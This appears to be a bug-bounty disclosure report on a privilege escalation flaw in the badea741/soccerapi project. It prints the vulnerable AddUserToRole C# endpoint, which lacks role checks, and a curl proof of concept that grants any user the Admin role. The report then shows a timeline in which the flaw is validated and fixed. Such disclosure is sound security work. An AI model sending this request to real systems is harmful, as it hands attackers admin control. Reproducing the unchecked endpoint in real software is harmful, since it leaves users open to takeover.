Normal user can set himself or any other user to admin role in badea741/soccerapi

Valid

Reported on

Sep 20th 2022


Description

Improper access to an API endpointAddUserToRole can allow a regular user to escalate his privileges to be an admin

Infected code

[Authorize(Roles = Roles.User)]
    [HttpPost]
    public async Task<IActionResult> AddUserToRole([FromQuery] string username, string role)
    {
        var results = await _auth.AddUserToRoleAsync(username, role);
        if (!results.IsSuccess)
            return BadRequest(results);
        return Ok(results);
    }

As seen it just allows a user role to access this endpoint and no proper checks for what role can be added So it can be an admin role

Proof of Concept

curl -X 'POST' \
  'http://<SERVER>/Auth/AddUserToRole?username=<AnyUser>&role=Admin' \
  -H 'accept: */*' \
  -H 'Authorization: <TOKEN>' \
  -d ''

Impact

An attacker can escalate his privileges to be an admin in a peace of cake way.

We are processing your report and will contact the badea741/soccerapi team within 24 hours. 3 days ago
Aly Khaled modified the report
3 days ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 days ago
We have contacted a member of the badea741/soccerapi team and are waiting to hear back a day ago
badea741 validated this vulnerability 21 hours ago
Aly Khaled has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
badea741 confirmed that a fix has been merged on 2a06fc 21 hours ago
The fix bounty has been dropped
AuthController.cs#L67 has been validated
to join this conversation